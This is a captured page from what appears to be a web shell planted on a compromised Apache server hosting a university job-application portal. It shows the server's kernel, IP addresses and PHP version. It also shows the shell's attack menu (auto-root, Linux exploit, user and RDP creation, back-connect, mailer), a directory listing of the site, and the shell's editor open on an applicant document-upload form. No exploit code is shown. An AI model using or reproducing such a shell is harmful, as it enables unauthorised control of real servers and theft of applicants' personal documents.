Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.12.160.150
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
bcu /
orms_stop /
html_modules /
[ HOME SHELL ]
Name
Size
Permission
Action
academic_det.html
17.16
KB
-rw-rw-r--
check_list.pdf
107.23
KB
-rw-rw-r--
curricular_det.html
1.33
KB
-rw-rw-r--
declaration_det.html
1.93
KB
-rw-rw-r--
experience_det.html
6.52
KB
-rw-rw-r--
experience_det2.html
8.76
KB
-rw-rw-r--
experience_det_19082022.html
8.77
KB
-rw-rw-r--
other_det.html
9.85
KB
-rw-rw-r--
payment_det.html
334
B
-rw-rw-r--
persnal_det.html
9.44
KB
-rw-rw-r--
preview_det.html
117
B
-rw-rw-r--
printapp_det.html
88
B
-rw-rw-r--
research_det.html
10.03
KB
-rw-rw-r--
research_det_19082022.html
12.12
KB
-rw-rw-r--
research_det_2.html
37.16
KB
-rw-rw-r--
upload_det.html
8.87
KB
-rw-rw-r--
upload_det_20092017.html
3.54
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upload_det.html
<h4>Documents Uploading</h4> <h5><span style='color:red'>Note : </span>Each file size maximum 10MB only JPG / pdf files allowed</h5> <table class="table table-bordered" id="doc_table"> <thead> <tr> <th style="width:20px;">Sl.No.</th> <th style="width:400px;">Documents</th> <th style="width:100px;">Browse</th> <th style="width:100px;">Upload</th> <th style="width:100px;">Status</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Photo</td> <td><input type="file" id = "photo" class="form-control1"/></td> <td><input type="button" id = "bfile1" value="Upload" onClick="upload_file('photo');"/></td> <td><span id = 'tphoto'> </span></td> </tr> <tr> <td>2</td> <td>Signature</td> <td><input type="file" id = "signature" class="form-control1"/></td> <td><input type="button" id = "bfile1" value="Upload" onClick="upload_file2('signature');"/></td> <td><span id = 'tsignature'> </span></td> </tr> <tr> <td>3</td> <td>Matric/Higher Secondary/SSLC School (10th Class) Certificate/Marks Card</td> <td><input type="file" id = "10" class="form-control1"/></td> <td><input type="button" id = "bfile2" value="Upload" onClick="upload_file3('10');"/></td> <td><span id = 't10'> </span></td> </tr> <!-- <tr> <td>4</td> <td>Sr. Secondary/Intermediate (12th Class) Certificate</td> <td><input type="file" id = "12" class="form-control1"/></td> <td><input type="button" id = "bfile4" value="Upload" onClick="upload_file4('12');"/></td> <td><span id = 't12'> </span></td> </tr> --> <tr> <td>4</td> <td>Bachelor's Degree Marks Sheet</td> <td><input type="file" id = "ugms" class="form-control1"/></td> <td><input type="button" id = "bfile5" value="Upload" onClick="upload_file5('ugms');"/></td> <td><span id = 'tugms'> </span></td> </tr> <tr> <td>5</td> <td>Bachelor's Degree</td> <td><input type="file" id = "ug" class="form-control1"/></td> <td><input type="button" id = "bfile6" value="Upload" onClick="upload_file6('ug');"/></td> <td><span id = 'tug'> </span></td> </tr> <tr> <td>6</td> <td>B.Ed / Any Bachelor Degree</td> <td><input type="file" id = "bed" class="form-control1"/></td> <td><input type="button" id = "bfile16" value="Upload" onClick="upload_file16('bed');"/></td> <td><span id = 'tbed'> </span></td> </tr> <tr> <td>7</td> <td>Master's Degree Marks Sheet</td> <td><input type="file" id = "pgms" class="form-control1"/></td> <td><input type="button" id = "bfile7" value="Upload" onClick="upload_file7('pgms');"/></td> <td><span id = 'tpgms'> </span></td> </tr> <tr> <td>8</td> <td>Master's Degree</td> <td><input type="file" id = "pg" class="form-control1"/></td> <td><input type="button" id = "bfile8" value="Upload" onClick="upload_file8('pg');"/></td> <td><span id = 'tpg'> </span></td> </tr> <tr> <td>9</td> <td>M.Ed / Any Master Degree</td> <td><input type="file" id = "med" class="form-control1"/></td> <td><input type="button" id = "bfile8" value="Upload" onClick="upload_file17('med');"/></td> <td><span id = 'tmed'> </span></td> </tr> <tr> <td>10</td> <td>M. Phil. Marks Sheet</td> <td><input type="file" id = "mpil" class="form-control1"/></td> <td><input type="button" id = "bfile9" value="Upload" onClick="upload_file9('mpil');"/></td> <td><span id = 'tmpil'> </span></td> </tr> <tr> <td>11</td> <td>Ph. D. Degree (Ph.D Degree Norms as per UGC Notification)</td> <td><input type="file" id = "phd" class="form-control1"/></td> <td><input type="button" id = "bfile11" value="Upload" onClick="upload_file10('phd');"/></td> <td><span id = 'tphd'> </span></td> </tr> <tr> <td>12</td> <td>Ph.D Course Completion Certificate as per UGC regulations (applicable for candidates completed Ph.D before 11 July 2009)</td> <td><input type="file" id = "phdu" class="form-control1"/></td> <td><input type="button" id = "bfile12" value="Upload" onClick="upload_file14('phdu');"/></td> <td><span id = 'tphdu'> </span></td> </tr> <tr> <td>13</td> <td>SC/ST/PWD/OBC Certificate as per GoI format(if Applicable)</td> <td><input type="file" id = "sc" class="form-control1"/></td> <td><input type="button" id = "bfile12" value="Upload" onClick="upload_file15('sc');"/></td> <td><span id = 'tsc'> </span></td> </tr> <tr> <td>14</td> <td>NET-JRF</td> <td><input type="file" id = "jre" class="form-control1"/></td> <td><input type="button" id = "bfile12" value="Upload" onClick="upload_file11('jre');"/></td> <td><span id = 'tjre'> </span></td> </tr> <tr> <td>15</td> <td>NET</td> <td><input type="file" id = "net" class="form-control1"/></td> <td><input type="button" id = "bfile12" value="Upload" onClick="upload_file12('net');"/></td> <td><span id = 'tnet'> </span></td> </tr> <tr> <td>16</td> <td>SLET </td> <td><input type="file" id = "slet" class="form-control1"/></td> <td><input type="button" id = "bfile12" value="Upload" onClick="upload_file13('slet');"/></td> <td><span id = 'tslet'> </span></td> </tr> <!-- <tr> <td>17</td> <td>No Objection Certificate <br><p><b>Please Download the No Objection Certificate(if Applicable)<a href = "docs/noc.pdf" target="_blank">Click Here</a></p></td> <td><input type="file" id = "noc" class="form-control1"/></td> <td><input type="button" id = "bfile14" value="Upload" onClick="upload_file20('noc');"/></td> <td><span id = 'tnoc'> </span></td> </tr> --> <tr> <td>17</td> <td>Check List and List of Enclosures<br><p><b>Please Download the Check List and List of Enclosures<a href = "docs/check_list.pdf" target="_blank">Click Here</a></p></td> <td><input type="file" id = "clae" class="form-control1"/></td> <td><input type="button" id = "bfile14" value="Upload" onClick="upload_file4('clae');"/></td> <td><span id = 'tclae'> </span></td> </tr> <tr> <td>18</td> <td>Experience</td> <td><input type="file" id = "exp" class="form-control1"/></td> <td><input type="button" id = "bfile12" value="Upload" onClick="upload_file20('exp');"/></td> <td><span id = 'texp'> </span></td> </tr> <tr> <td>19</td> <td>Research Experience (hard copy need to submited at respective department)</td> <td><input type="file" id = "rech" class="form-control1"/></td> <td><input type="button" id = "bfile12" value="Upload" onClick="upload_file19('rech');"/></td> <td><span id = 'trech'> </span></td> </tr> <!--<tr> <td>17</td> <td>Research 2</td> <td><input type="file" id = "rch2" class="form-control1"/></td> <td><input type="button" id = "bfile12" value="Upload" onClick="upload_file16('rch2');"/></td> <td><span id = 'trch2'> </span></td> </tr> <tr> <td>18</td> <td>Research 3</td> <td><input type="file" id = "rch3" class="form-control1"/></td> <td><input type="button" id = "bfile12" value="Upload" onClick="upload_file17('rch3');"/></td> <td><span id = 'trch3'> </span></td> </tr> <tr> <td>19</td> <td>Research 4</td> <td><input type="file" id = "rch4" class="form-control1"/></td> <td><input type="button" id = "bfile12" value="Upload" onClick="upload_file18('rch4');"/></td> <td><span id = 'trch4'> </span></td> </tr> <tr> <td>20</td> <td>Research 5</td> <td><input type="file" id = "rch5" class="form-control1"/></td> <td><input type="button" id = "bfile12" value="Upload" onClick="upload_file19('rch5');"/></td> <td><span id = 'trch5'> </span></td> </tr> --> </tbody> </table>
Close